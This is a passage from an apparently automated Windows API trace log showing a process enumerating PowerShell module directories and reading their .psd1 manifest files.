nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0153.422] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1a8e27, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0153.422] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d783500, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d783500, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1de9cd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x19bdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0153.422] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d783500, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d783500, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1de9cd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x19bdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0153.422] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.423] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0153.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0153.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0153.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0153.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0153.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1"), fInfoLevelId=0x0, lpFileInformation=0x275da28 | out: lpFileInformation=0x275da28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1a8e27, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1c8)) returned 1 [0153.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0153.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0153.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.424] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.424] GetFileType (hFile=0x520) returned 0x1 [0153.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.424] GetFileType (hFile=0x520) returned 0x1 [0153.425] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.425] ReadFile (in: hFile=0x520, lpBuffer=0x275e858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x275e858*, lpNumberOfBytesRead=0x5a0e4c8*=0x1c8, lpOverlapped=0x0) returned 1 [0153.465] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x1c8 [0153.465] ReadFile (in: hFile=0x520, lpBuffer=0x275e858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x275e858*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.465] CloseHandle (hObject=0x520) returned 1 [0153.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0153.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0153.467] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.467] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.467] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0153.467] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0153.467] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.468] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0153.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x7a [0153.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x7a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0153.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x7a [0153.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x7a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0153.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.468] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x276372c | out: lpFileInformation=0x276372c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x288)) returned 1 [0153.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x7a [0153.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x7a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0153.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.469] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.469] GetFileType (hFile=0x520) returned 0x1 [0153.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.469] GetFileType (hFile=0x520) returned 0x1 [0153.470] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.470] ReadFile (in: hFile=0x520, lpBuffer=0x276456c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x276456c*, lpNumberOfBytesRead=0x5a0e4c8*=0x288, lpOverlapped=0x0) returned 1 [0153.565] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x288 [0153.565] ReadFile (in: hFile=0x520, lpBuffer=0x276456c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x276456c*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.565] CloseHandle (hObject=0x520) returned 1 [0153.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0153.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0153.567] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.567] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.567] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0153.567] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0153.567] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.567] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20 [0153.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6c [0153.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x6c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0153.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6c [0153.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x6c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0153.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1"), fInfoLevelId=0x0, lpFileInformation=0x276a118 | out: lpFileInformation=0x276a118*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e37f4, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x1d4)) returned 1 [0153.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6c [0153.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x6c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0153.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.569] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.569] GetFileType (hFile=0x520) returned 0x1 [0153.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.570] GetFileType (hFile=0x520) returned 0x1 [0153.570] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.570] ReadFile (in: hFile=0x520, lpBuffer=0x276af40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x276af40*, lpNumberOfBytesRead=0x5a0e4c8*=0x1d4, lpOverlapped=0x0) returned 1 [0153.572] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x1d4 [0153.572] ReadFile (in: hFile=0x520, lpBuffer=0x276af40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x276af40*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.572] CloseHandle (hObject=0x520) returned 1 [0153.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0153.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0153.574] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.574] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.574] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, 